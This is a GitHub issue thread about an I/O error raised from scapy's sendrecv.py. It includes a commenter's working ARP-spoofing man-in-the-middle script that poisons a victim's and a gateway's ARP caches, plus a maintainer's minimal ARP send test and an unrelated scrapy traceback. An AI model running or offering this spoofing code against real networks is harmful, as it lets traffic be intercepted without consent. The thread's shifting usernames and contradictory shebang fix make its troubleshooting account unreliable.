### ISSUE TITLE
OSError: [Errno 5] Input/output error from scapy/sendrecv.py

### ISSUE THREAD

**Issue by Syslog777** [secdev/scapy#975] opened 2017-12-03 23:49 UTC
I'm getting the following error message:

`File "/scapy/scapy/sendrecv.py", line 257, in __gen_send     os.write(1,b'.')
OSError: [Errno 5] Input/output error`

It seems that `os.write(1,b'.')` is causing an I/O error. I do not know how it is being triggered.
What I do notice is that is does not follow the repository guidelines as follows:

> byte-string must be defined as b"\x00\x01\x02"

**Comment by guedou** [comment] 2017-12-04 08:13
Could you provide a more specific description of your issue (small example, Scapy version, ...) ? We cannot fix what we cannot reproduce ...

**Comment by BitCoder444** [comment] 2017-12-05 09:42
I finally found the bug: it was on my end.
At the top of my file I wrote a shebang to define the interpreter I wanted to use. I thought I could use Python 3.6, so I wrote `#!/usr/bin/python3.5`. That is what caused the bug. I simply changed it to `#/usr/bin/python3.5`. 
If you haven't indicated that scapy runs on python3.5, please do so. It makes a huge difference for some of us.

**Comment by guedou** [comment] 2017-12-05 12:02
Python 3 support is still in development. However, all Python 3 versions should work.

Could you report a minimal example that triggered the crash ?

**Comment by BlackByte010** [comment] 2017-12-06 08:38
```
#!/usr/bin/python3.6
# /usr/bin/python3.6 is the only line of code I changed to fix the crash
# -*- coding: utf-8 -*-
import os
import sys
import time
sys.path.append(os.path.abspath("/root/scapy/"))
from scapy.all import *
import mitm_input

"""
Created on Sun Nov 26 22:27:16 2017
@author:  BlackByte010 
TODO: rename all vars and funcs in respect to "node"
"""

#Get the input
interface = mitm_input.get_interface()
victimIP = mitm_input.get_victimIP()
gateIP = mitm_input.get_gateIP()
print ("\n[*] Enabling IP forwarding....\n")
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")

#Get the mac addresses
"""
Properly created ARP responses require the victim's and router's MAC adresses
get_mac() sends and ARP request and returns the result.
"""
def get_mac(IP):
    conf.verb = 1
    ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP),
                     timeout = 2, iface = interface, inter = 0.1)
    for snd, rcv in ans:
        return rcv.sprintf(r"%Ether.src%")

#Re-arp the targets
"""
The target's addresses must be re-assigned so that they will send their data to
the correct destination.
"""    
def reARP():
    print("\n[*] Restoring targets...")
    victimMAC = get_mac(victimIP)
    gateMAC = get_mac(gateIP)
 #   send(ARP(op = 2, pdst = gateIP, psrc = victimIP,
 #            hwdst = "ff:ff:ff:ff:ff:ff", count = 7))
 #   send(ARP(op = 2, pdst = victimIP, psrc = gateIP,
 #            hwdst = "ff:ff:ff:ff:ff:ff", count = 7))
    send(ARP(op = 2, pdst = gateIP, psrc = victimIP,
             hwdst = gateMAC, count = 7))
    send(ARP(op = 2, pdst = victimIP, psrc = gateIP,
             hwdst = victimMAC, count = 7))
    print("[*] Disabling IP forwarding...")
    os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
    print("[*] Shutting down...")
    sys.exit(1)

#Trick the targets
#def trick(gm, vm):
#    send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = vm))
#    send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = gm))
def trick(gm, vm):
#    send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = vm))
#    send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = gm))
    send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = gm))
send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = vm)) 
```

**Comment by guedou** [comment] 2017-12-07 21:06
I cannot reproduce with the current master and Python3.6.

```
$ cat test.py 
from scapy.all import *
send(ARP(op=2, pdst="1.2.3.4", psrc="5.6.7.8", hwdst="00:01:02:03:04:05"))
$ sudo python3.6 test.py 
.
Sent 1 packets.
```

Could you provide more details about your environment?

**Comment by Syslog777** [comment] 2017-12-07 22:42
I have python2.7, 3, 3.5 and 3.6 installed.       Scapy is not on my $PATH variable, so I had to append it to the PYTHONPATH var. I'm running on a 64-bit machine and linuxlite. I'm also using my phone as a hotspot because I have no WiFi here.

**Comment by guedou** [comment] 2017-12-08 14:28
Can you reproduce the issue using my small example ? Also, I need the Scapy and Python version that you are using.

I will close this issue if you don't provide these information as I cannot reproduce it.

**Comment by Syslog777** [comment] 2017-12-08 20:15
Scapy Version 2.3.3.dev919
Python version 3.5.4
I was not able to reproduce the issue with your code.

**Comment by guedou** [comment] 2017-12-10 19:42
I can't reproduce your issues despite my efforts on different operating system. It might be caused by your setup.

You can reopen this issue if you manage to provide a simple reproducer.

**Closed by guedou** 2017-12-10 19:42 UTC

**Comment by lxmn** [comment] 2018-07-26 11:49
I am also getting same error , does anyone have any solution about this .
```
2018-07-25 00:51:12 [scrapy.core.scraper] ERROR: Spider error processing <GET http://www.34551.com/Taiwan/BONTLY-INTERNATIONAL-CORP_auooo.html> (referer: http://www.34551.com/Taiwan/um_umpx.htm)
Traceback (most recent call last):
  File "/usr/lib64/python3.6/site-packages/scrapy/utils/defer.py", line 102, in iter_errback
    yield next(it)
  File "/usr/lib64/python3.6/site-packages/scrapy/spidermiddlewares/offsite.py", line 30, in process_spider_output
    for x in result:
  File "/usr/lib64/python3.6/site-packages/scrapy/spidermiddlewares/referer.py", line 339, in <genexpr>
    return (_set_referer(r) for r in result or ())
  File "/usr/lib64/python3.6/site-packages/scrapy/spidermiddlewares/urllength.py", line 37, in <genexpr>
    return (r for r in result or () if _filter(r))
  File "/usr/lib64/python3.6/site-packages/scrapy/spidermiddlewares/depth.py", line 58, in <genexpr>
    return (r for r in result or () if _filter(r))
  File "/home/piyush.sambhi/Denave/ScraperDenave/denavescraper/spiders/genericSpider5.py", line 277, in detail_page
    print (log_str)
OSError: [Errno 5] Input/output error

```
